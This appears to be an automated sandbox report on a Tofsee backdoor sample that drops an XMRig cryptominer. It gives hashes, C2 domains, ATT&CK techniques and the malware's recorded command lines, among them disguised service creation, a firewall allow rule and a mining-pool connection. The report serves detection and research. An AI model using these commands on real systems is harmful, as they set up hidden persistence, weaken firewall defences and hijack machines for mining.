Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    17-04-2023 18:02

General

  • Target

    13b61045b92866c3ab14e075ea80fa6c4e63ef3e22eb582bf542cbfb2ae6f610.exe

  • Size

    351KB

  • MD5

    4a18a94055dba3c5ad2fa1a10582eec3

  • SHA1

    fc0c32941f69383c2ab6ae53af514331fe68af84

  • SHA256

    13b61045b92866c3ab14e075ea80fa6c4e63ef3e22eb582bf542cbfb2ae6f610

  • SHA512

    5bf4346b3fce12a314f6327f840d88e2ea1d7f00c5fecb7f2b14d2eb69a447008bccc52508728791a7a8eaecccfa0b99fe51c032875e18adc64a212434e5fbf4

  • SSDEEP

    6144:aVvvhSKsCU9XmGm0kn0MM7FOmSafuzq+7XUBybbCt:aVvkKsFMGm0k0MM7lSqutDUub

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\13b61045b92866c3ab14e075ea80fa6c4e63ef3e22eb582bf542cbfb2ae6f610.exe
    "C:\Users\Admin\AppData\Local\Temp\13b61045b92866c3ab14e075ea80fa6c4e63ef3e22eb582bf542cbfb2ae6f610.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1392
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kbxppfjz\
      2⤵
        PID:1244
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qkpnilik.exe" C:\Windows\SysWOW64\kbxppfjz\
        2⤵
          PID:1048
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create kbxppfjz binPath= "C:\Windows\SysWOW64\kbxppfjz\qkpnilik.exe /d\"C:\Users\Admin\AppData\Local\Temp\13b61045b92866c3ab14e075ea80fa6c4e63ef3e22eb582bf542cbfb2ae6f610.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1860
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description kbxppfjz "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1120
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start kbxppfjz
          2⤵
          • Launches sc.exe
          PID:1164
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1356
      • C:\Windows\SysWOW64\kbxppfjz\qkpnilik.exe
        C:\Windows\SysWOW64\kbxppfjz\qkpnilik.exe /d"C:\Users\Admin\AppData\Local\Temp\13b61045b92866c3ab14e075ea80fa6c4e63ef3e22eb582bf542cbfb2ae6f610.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:1668
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1256

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\qkpnilik.exe
        Filesize

        12.6MB

        MD5

        5684e5fe082dc3ed2dea314c8cfb64ef

        SHA1

        a4e93bc13668bbdd0857665e1d38ef6fb7291c78

        SHA256

        87ea2621d7e6877a722dddfa8b294c4d7919033c5e42f4bb43c92209932d0b15

        SHA512

        f76dcfb31954ed1b86cadd25396a64ce5730a4f02d31ef99270ef91b19d67318b3ed0a815dea66239fc2bd8d3a14c89ef69b3c3a9777e525414aef282b9cb642

      • C:\Windows\SysWOW64\kbxppfjz\qkpnilik.exe
        Filesize

        12.6MB

        MD5

        5684e5fe082dc3ed2dea314c8cfb64ef

        SHA1

        a4e93bc13668bbdd0857665e1d38ef6fb7291c78

        SHA256

        87ea2621d7e6877a722dddfa8b294c4d7919033c5e42f4bb43c92209932d0b15

        SHA512

        f76dcfb31954ed1b86cadd25396a64ce5730a4f02d31ef99270ef91b19d67318b3ed0a815dea66239fc2bd8d3a14c89ef69b3c3a9777e525414aef282b9cb642

      • memory/1148-66-0x0000000000400000-0x00000000007FC000-memory.dmp
        Filesize

        4.0MB

      • memory/1256-119-0x0000000000200000-0x00000000002F1000-memory.dmp
        Filesize

        964KB

      • memory/1256-123-0x0000000000200000-0x00000000002F1000-memory.dmp
        Filesize

        964KB

      • memory/1256-122-0x0000000000200000-0x00000000002F1000-memory.dmp
        Filesize

        964KB

      • memory/1256-120-0x0000000000200000-0x00000000002F1000-memory.dmp
        Filesize

        964KB

      • memory/1256-121-0x0000000000200000-0x00000000002F1000-memory.dmp
        Filesize

        964KB

      • memory/1256-118-0x0000000000200000-0x00000000002F1000-memory.dmp
        Filesize

        964KB

      • memory/1256-111-0x0000000000200000-0x00000000002F1000-memory.dmp
        Filesize

        964KB

      • memory/1256-110-0x0000000000200000-0x00000000002F1000-memory.dmp
        Filesize

        964KB

      • memory/1392-60-0x0000000000400000-0x00000000007FC000-memory.dmp
        Filesize

        4.0MB

      • memory/1392-56-0x00000000002A0000-0x00000000002B3000-memory.dmp
        Filesize

        76KB

      • memory/1668-88-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-96-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-81-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-82-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-83-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-84-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-85-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-86-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-87-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-75-0x00000000000A0000-0x00000000000A6000-memory.dmp
        Filesize

        24KB

      • memory/1668-89-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-90-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-91-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-92-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-93-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-94-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-95-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-78-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-97-0x00000000001A0000-0x00000000001B0000-memory.dmp
        Filesize

        64KB

      • memory/1668-98-0x00000000001B0000-0x00000000001B5000-memory.dmp
        Filesize

        20KB

      • memory/1668-101-0x00000000001B0000-0x00000000001B5000-memory.dmp
        Filesize

        20KB

      • memory/1668-102-0x0000000005530000-0x000000000593B000-memory.dmp
        Filesize

        4.0MB

      • memory/1668-105-0x0000000005530000-0x000000000593B000-memory.dmp
        Filesize

        4.0MB

      • memory/1668-106-0x00000000001C0000-0x00000000001C7000-memory.dmp
        Filesize

        28KB

      • memory/1668-74-0x00000000018B0000-0x0000000001ABF000-memory.dmp
        Filesize

        2.1MB

      • memory/1668-71-0x00000000018B0000-0x0000000001ABF000-memory.dmp
        Filesize

        2.1MB

      • memory/1668-69-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1668-68-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1668-67-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1668-63-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1668-62-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
        Filesize

        4KB

      • memory/1668-61-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1668-124-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB